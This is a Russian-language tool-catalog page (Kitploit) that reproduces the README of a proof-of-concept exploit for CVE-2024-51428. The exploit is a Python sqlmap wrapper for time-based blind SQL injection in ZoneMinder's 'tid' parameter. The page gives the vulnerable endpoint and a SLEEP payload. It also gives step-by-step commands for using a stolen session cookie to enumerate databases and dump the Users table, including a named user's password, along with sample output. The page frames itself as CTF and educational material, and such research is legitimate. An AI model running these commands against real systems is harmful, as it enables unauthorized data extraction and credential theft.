Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-51428-PoC — Обёртка на Python для эксплуатации CVE-2024-51428 в ZoneMinder с использованием Blind SQL Injection через sqlmap, автоматизирующая перечисление БД, таблиц и извлечение данных с чистым выводом. | Kitploit
Инструменты/GitHubGitHub/d1se0/cve-2024-51428-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

Обёртка на Python для эксплуатации CVE-2024-51428 в ZoneMinder с использованием Blind SQL Injection через sqlmap, автоматизирующая перечисление БД, таблиц и извлечение данных с чистым выводом.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-51428 - PoC слепой SQL-инъекции в ZoneMinder

Python-обёртка для sqlmap, предназначенная для эксплуатации CVE-2024-51428 в ZoneMinder.
Этот инструмент автоматизирует обнаружение и эксплуатацию уязвимости Blind SQL Injection, при этом вывод остаётся чистым и сосредоточенным на полезных данных.

Скрипт скрывает логи sqlmap и отображает только релевантную информацию, такую как:

  • Обнаруженная точка инъекции
  • Имена баз данных
  • Таблицы
  • Извлечённые учётные данные или конфиденциальная информация

Это делает инструмент идеальным для CTF-сред, демонстраций и тестирования безопасности.


Обзор уязвимости

CVE: CVE-2024-51428
Тип: Blind SQL Injection
Уязвимое ПО: ZoneMinder
Вектор атаки: HTTP GET параметр
Параметр: tid

Уязвимость существует в следующей конечной точке:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

Параметр tid недостаточно очищается перед использованием в запросе к базе данных, что позволяет злоумышленникам внедрять SQL-запросы.

Используемый метод эксплуатации — time-based blind SQL injection.

Пример полезной нагрузки, обнаруженной sqlmap:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

Эта полезная нагрузка заставляет базу данных засыпать, если запрос выполняется успешно, что подтверждает наличие SQL-инъекции.


Возможности

  • Автоматическое обнаружение Blind SQL Injection
  • Перечисление баз данных
  • Перечисление таблиц
  • Дамп таблиц
  • Фильтрация столбцов
  • Фильтрация строк
  • Чистый вывод (логи sqlmap скрыты)
  • Разработан для CTF и лабораторий пентестинга

Требования

  • Python 3
  • sqlmap

Установите sqlmap при необходимости:

root@kitploit:~
sudo apt install sqlmap

Использование

Базовый синтаксис:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

С помощью этой команды мы проверяем, уязвима ли цель

Пример:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

Получение необходимого Cookie

Эксплоит требует действующей cookie сессии ZoneMinder.

Шаги:

  1. Откройте цель в браузере
  2. Откройте инструменты разработчика
  3. Перейдите в:
root@kitploit:~
Application → Cookies
  1. Найдите cookie с именем:
root@kitploit:~
ZMSESSID
  1. Скопируйте её значение и используйте с флагом -c

Пример:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

Проверка уязвимости цели

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

Пример вывода:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

Перечисление баз данных

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

Пример вывода:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

Перечисление таблиц

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

Пример вывода:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

Дамп таблицы

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

Дамп конкретного столбца

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

Пример:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

Фильтрация строк (условие WHERE)

Вы можете фильтровать строки с помощью:

root@kitploit:~
-ff <COLUMN> <VALUE>

Пример:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

Эквивалентный SQL:

root@kitploit:~
WHERE Username='mark'

Дамп пароля для конкретного пользователя

Пример:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

Внутренняя команда sqlmap:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

Как работает инструмент

Скрипт действует как обёртка для sqlmap.

Выполняемые внутренние шаги:

  1. Построение уязвимой конечной точки
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. Передача cookie аутентификации в sqlmap
  2. Запуск sqlmap с оптимизированными параметрами:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. Разбор вывода sqlmap в реальном времени
  2. Фильтрация логов и отображение только:
  • информации об инъекции
  • баз данных
  • таблиц
  • извлечённых данных

Назначение

Этот инструмент создан для:

  • Соревнований Capture The Flag
  • Исследований в области безопасности
  • Образовательных целей
  • Лабораторий пентестинга

Отказ от ответственности

Этот проект предоставлен только для образовательных целей и авторизованного тестирования безопасности.

Автор не несёт ответственности за любое неправомерное использование данного инструмента.

Всегда получайте соответствующее разрешение перед тестированием любой системы.


Автор

Security Research / CTF tooling

Скачать инструмент